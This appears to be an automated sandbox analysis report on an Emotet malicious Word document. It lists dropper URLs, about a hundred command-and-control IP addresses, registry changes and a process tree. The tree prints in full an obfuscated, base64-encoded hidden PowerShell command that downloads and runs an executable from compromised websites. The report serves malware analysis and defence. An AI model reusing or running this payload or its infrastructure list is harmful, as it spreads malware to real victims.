Analysis
-
max time kernel
138s -
resource
win7v191014 -
submitted
11-12-2019 03:53
Task
task1
Sample
Docs_6ad036ba93c94d6976e2d93c7a3aec6f.html.doc
Resource
win7v191014
0 signatures
General
Malware Config
Extracted
Language
ps1
Source
URLs
exe.dropper
http://www.prorites.com/wp-content/dsdb28de-kw0ch1msvi-003/
exe.dropper
https://www.silvesterinmailand.com/wp-content/uploads/ibvgux-yg4-03475/
exe.dropper
http://homemyland.net/tmp/wUHdeBS/
exe.dropper
https://www.celbra.com.br/old/wp-content/uploads/2019/mbwl6-lwu0psmcb-523/
exe.dropper
http://prihlaska.sagitta.cz/wp-content/uploads/WwcQXtRta/
Extracted
Family
emotet
C2
200.41.121.69:443
153.190.41.185:80
165.100.148.200:443
103.9.145.19:8080
46.105.128.215:8080
172.105.213.30:80
69.30.205.162:7080
172.104.70.207:8080
198.57.217.170:8080
103.122.75.218:80
212.112.113.235:80
113.52.135.33:7080
60.53.3.153:8080
1.32.54.12:8080
142.93.87.198:8080
91.117.31.181:80
45.129.121.222:443
186.215.101.106:80
143.95.101.72:8080
187.233.220.93:443
128.92.54.20:80
181.197.108.171:443
78.186.102.195:80
193.33.38.208:443
51.38.134.203:8080
24.27.122.202:80
181.47.235.26:993
210.111.160.220:80
162.144.46.90:8080
176.58.93.123:80
46.17.6.116:8080
174.57.150.13:8080
178.134.1.238:80
95.216.212.157:8080
37.59.24.25:8080
172.90.70.168:443
5.189.148.98:8080
177.103.201.23:80
115.179.91.58:80
200.71.112.158:53
190.161.67.63:80
23.253.207.142:8080
85.109.190.235:443
89.215.225.15:80
67.171.182.231:80
195.191.107.67:80
188.230.134.205:80
58.93.151.148:80
138.197.140.163:8080
122.11.164.183:80
192.161.190.171:8080
192.241.220.183:8080
190.5.162.204:80
119.159.150.176:443
83.99.211.160:80
210.224.65.117:80
211.218.105.101:80
50.116.78.109:8080
163.172.97.112:8080
98.15.140.226:80
216.75.37.196:8080
181.44.166.242:80
67.254.196.78:443
81.82.247.216:80
192.210.217.94:8080
190.171.135.235:80
110.142.161.90:80
83.110.107.243:443
86.6.123.109:80
72.69.99.47:80
83.156.88.159:80
189.61.200.9:443
95.216.207.86:7080
82.79.244.92:80
124.150.175.129:8080
182.176.116.139:995
46.105.131.68:8080
85.105.183.228:443
77.245.12.212:80
190.189.79.73:80
201.183.251.100:80
123.142.37.165:80
187.250.92.82:80
221.154.59.110:80
78.46.87.133:8080
195.250.143.182:80
152.169.32.143:8080
201.196.15.79:990
41.77.74.214:443
24.28.178.71:80
190.101.87.170:80
72.27.212.209:8080
191.100.24.201:50000
192.163.221.191:8080
212.129.14.27:8080
124.150.175.133:80
41.218.118.66:80
189.225.211.171:443
rsa_pubkey.plain
Signatures
-
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
WINWORD.EXEpid process 1520 WINWORD.EXE -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
Powershell.exedescription pid process Token: SeDebugPrivilege 1484 Powershell.exe -
Executes dropped EXE 4 IoCs
Processes:
216.exe216.exepdftrns.exepdftrns.exepid process 1268 216.exe 1936 216.exe 2032 pdftrns.exe 1996 pdftrns.exe -
Processes:
description ioc Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d090000000100000042000000304006082b0601050507030406082b0601050507030106082b0601050507030206082b06010505070308060a2b0601040182370a0304060a2b0601040182370a030c6200000001000000200000000687260331a72403d909f105e69bcf0d32e1bd2493ffc6d9206d11bcd67707390b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 1520 WINWORD.EXE -
Suspicious use of SetWindowsHookEx 6 IoCs
Processes:
WINWORD.EXEconhost.exe216.exe216.exepdftrns.exepdftrns.exepid process 1520 WINWORD.EXE 1336 conhost.exe 1268 216.exe 1936 216.exe 2032 pdftrns.exe 1996 pdftrns.exe -
Suspicious behavior: EmotetMutantsSpam 2 IoCs
Processes:
216.exepdftrns.exepid process 1936 216.exe 1996 pdftrns.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Drops file in System32 directory 6 IoCs
Processes:
WINWORD.EXEPowershell.exe216.exepdftrns.exedescription ioc process File created C:\Windows\system32\spool\DRIVERS\x64\3\mxdwdui.BUD WINWORD.EXE File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk Powershell.exe File opened for modification C:\Windows\system32\GDIPFONTCACHEV1.DAT WINWORD.EXE File renamed C:\Users\Admin\216.exe => C:\Windows\SysWOW64\pdftrns.exe 216.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat pdftrns.exe File deleted C:\Windows\System32\spool\drivers\x64\3\mxdwdui.BUD WINWORD.EXE -
Modifies registry class 136 IoCs
Processes:
description ioc Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}\ = "IReturnInteger" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}\ = "Tabs" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}\ = "MdcToggleButtonEvents" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}\ = "IReturnBoolean" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcList" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080}\ = "IPage" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF}\ = "IMultiPage" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcOptionButton" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSubmitButton" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLText" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents3" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents5" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F}\ = "MultiPageEvents" Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{6548A8F9-43D9-477D-88C0-5F2211FDBFB9}\2.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Word8.0" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}\ = "FormEvents" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3}\ = "MdcCheckBoxEvents" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F}\ = "TabStripEvents" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F}\ = "MultiPageEvents" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}\ = "IReturnSingle" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}\ = "IReturnEffect" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}\ = "IControl" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}\ = "IOptionFrame" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3}\ = "MdcComboEvents" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents6" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents9" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\TypeLib\{6548A8F9-43D9-477D-88C0-5F2211FDBFB9}\2.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Word8.0" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}\ = "IReturnBoolean" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcOptionButton" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLReset" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLCheckbox" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF}\ = "IMultiPage" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}\ = "IDataAutoWrapper" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}\ = "FormEvents" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF}\ = "ITabStrip" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{4C599243-6926-101B-9992-00000B65C6F9}\ = "IImage" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}\ = "ScrollbarEvents" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents4" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents6" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCombo" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCheckBox" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}\ = "ControlEvents" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}\ = "ISpinbutton" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F}\ = "CommandButtonEvents" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents7" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents9" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}\ = "_UserForm" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents1" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}\ = "IReturnInteger" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}\ = "IReturnString" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF}\ = "ILabelControl" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}\ = "Tabs" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLCheckbox" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3}\ = "MdcOptionButtonEvents" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}\ = "ScrollbarEvents" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080}\ = "Tab" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9}\ = "ImageEvents" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents3" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLOption" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLText" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSelect" Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{6548A8F9-43D9-477D-88C0-5F2211FDBFB9}\2.0\0\win32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Word8.0\\MSForms.exd" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}\ = "Controls" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLReset" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLPassword" -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
Powershell.exepdftrns.exepid process 1484 Powershell.exe 1996 pdftrns.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
Powershell.exe216.exepdftrns.exedescription pid process target process PID 1484 wrote to memory of 1268 1484 Powershell.exe 216.exe PID 1268 wrote to memory of 1936 1268 216.exe 216.exe PID 2032 wrote to memory of 1996 2032 pdftrns.exe pdftrns.exe
Processes
-
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Docs_6ad036ba93c94d6976e2d93c7a3aec6f.html.doc"1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Drops file in System32 directory
-
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exePowershell -w hidden -en JABCAHgAdQBoAGkAaABuAHIAdwBrAHoAbgBiAD0AJwBRAHIAYQBnAGkAcAB4AHcAZwAnADsAJABBAG4AdwBtAGkAdwBiAHUAegBoAHAAIAA9ACAAJwAyADEANgAnADsAJABUAHoAbgBsAG8AaQB5AGoAZgA9ACcASABzAHcAeQBkAGQAdwB5AGcAaQBzAGQAaAAnADsAJABUAG4AcwBlAHIAdABrAGQAegBlAHAAegA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAQQBuAHcAbQBpAHcAYgB1AHoAaABwACsAJwAuAGUAeABlACcAOwAkAEEAZwBkAGIAbgBjAHAAYQB0AHMAPQAnAEwAZQBkAGUAYwBsAHYAcwBvAGwAcgB0AHQAJwA7ACQAVwBuAGsAdgB4AHcAYgBhAD0AJgAoACcAbgAnACsAJwBlAHcALQBvACcAKwAnAGIAJwArACcAagBlAGMAdAAnACkAIABOAGUAdAAuAFcAZQBCAEMATABpAEUAbgBUADsAJABXAHoAagBsAGkAbABqAGMAZQA9ACcAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAHAAcgBvAHIAaQB0AGUAcwAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAGQAcwBkAGIAMgA4AGQAZQAtAGsAdwAwAGMAaAAxAG0AcwB2AGkALQAwADAAMwAvACoAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AcwBpAGwAdgBlAHMAdABlAHIAaQBuAG0AYQBpAGwAYQBuAGQALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwB1AHAAbABvAGEAZABzAC8AaQBiAHYAZwB1AHgALQB5AGcANAAtADAAMwA0ADcANQAvACoAaAB0AHQAcAA6AC8ALwBoAG8AbQBlAG0AeQBsAGEAbgBkAC4AbgBlAHQALwB0AG0AcAAvAHcAVQBIAGQAZQBCAFMALwAqAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAGMAZQBsAGIAcgBhAC4AYwBvAG0ALgBiAHIALwBvAGwAZAAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwB1AHAAbABvAGEAZABzAC8AMgAwADEAOQAvAG0AYgB3AGwANgAtAGwAdwB1ADAAcABzAG0AYwBiAC0ANQAyADMALwAqAGgAdAB0AHAAOgAvAC8AcAByAGkAaABsAGEAcwBrAGEALgBzAGEAZwBpAHQAdABhAC4AYwB6AC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAHUAcABsAG8AYQBkAHMALwBXAHcAYwBRAFgAdABSAHQAYQAvACcALgAiAHMAcABgAGwAaQB0ACIAKAAnACoAJwApADsAJABNAHkAYgB3AGYAZQBmAGgAcgA9ACcAUgB0AHMAcwBkAGcAdQBlAGwAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFoAbABxAHYAcQBnAHMAZgB4AGoAYwByAGEAIABpAG4AIAAkAFcAegBqAGwAaQBsAGoAYwBlACkAewB0AHIAeQB7ACQAVwBuAGsAdgB4AHcAYgBhAC4AIgBEAG8AYABXAG4ATABgAE8AQQBkAEYAaQBsAEUAIgAoACQAWgBsAHEAdgBxAGcAcwBmAHgAagBjAHIAYQAsACAAJABUAG4AcwBlAHIAdABrAGQAegBlAHAAegApADsAJABEAHAAcgBtAG4AdQBvAHAAPQAnAEUAdgBjAGIAcwB2AGQAdABnACcAOwBJAGYAIAAoACgAJgAoACcARwBlAHQALQBJAHQAJwArACcAZQAnACsAJwBtACcAKQAgACQAVABuAHMAZQByAHQAawBkAHoAZQBwAHoAKQAuACIAbABlAG4AZwBgAFQASAAiACAALQBnAGUAIAAzADcANgA2ADkAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAcwB0AGEAYABSAHQAIgAoACQAVABuAHMAZQByAHQAawBkAHoAZQBwAHoAKQA7ACQAWQB1AGIAYQB2AGkAbAB6AHAAeQBuAGsAdgA9ACcAVABxAGsAdABiAHcAeABtAHkAJwA7AGIAcgBlAGEAawA7ACQATABrAHIAawBlAHcAcQBlAHIAeABrAD0AJwBHAGUAawBzAGcAaQBzAGYAZwByAGoAZAB3ACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEMAYgBoAGQAbABmAHcAYgBoAGUAPQAnAFUAcgB0AGgAaQBkAGwAbQB4AG0AZQAnAA==1⤵
- Suspicious use of AdjustPrivilegeToken
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\216.exe"C:\Users\Admin\216.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\216.exe--7272c7d53⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious behavior: EmotetMutantsSpam
- Drops file in System32 directory
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-2597591398348209951629390757-20837680671281542962-272171816-1368649592-2099165143"1⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵
-
C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"1⤵
-
C:\Windows\SysWOW64\pdftrns.exe"C:\Windows\SysWOW64\pdftrns.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\pdftrns.exe--ae2182ab2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious behavior: EmotetMutantsSpam
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\216.exe
-
C:\Users\Admin\216.exe
-
C:\Users\Admin\216.exe
-
C:\Windows\SysWOW64\pdftrns.exe
-
C:\Windows\SysWOW64\pdftrns.exe
-
memory/1268-9-0x0000000000310000-0x0000000000327000-memory.dmpFilesize
92KB
-
memory/1520-4-0x00000000065F2000-0x00000000065F6000-memory.dmpFilesize
16KB
-
memory/1520-6-0x00000000065F2000-0x00000000065F6000-memory.dmpFilesize
16KB
-
memory/1520-5-0x00000000065F2000-0x00000000065F6000-memory.dmpFilesize
16KB
-
memory/1520-0-0x00000000063D0000-0x00000000063D4000-memory.dmpFilesize
16KB
-
memory/1520-3-0x0000000009240000-0x0000000009244000-memory.dmpFilesize
16KB
-
memory/1520-2-0x000000000640F000-0x00000000064B8000-memory.dmpFilesize
676KB
-
memory/1520-1-0x000000000664C000-0x000000000664E000-memory.dmpFilesize
8KB
-
memory/1936-11-0x00000000001F0000-0x0000000000207000-memory.dmpFilesize
92KB
-
memory/1936-12-0x0000000000400000-0x0000000000492000-memory.dmpFilesize
584KB
-
memory/1996-16-0x0000000000290000-0x00000000002A7000-memory.dmpFilesize
92KB
-
memory/1996-17-0x0000000000400000-0x0000000000492000-memory.dmpFilesize
584KB
-
memory/2032-14-0x00000000003B0000-0x00000000003C7000-memory.dmpFilesize
92KB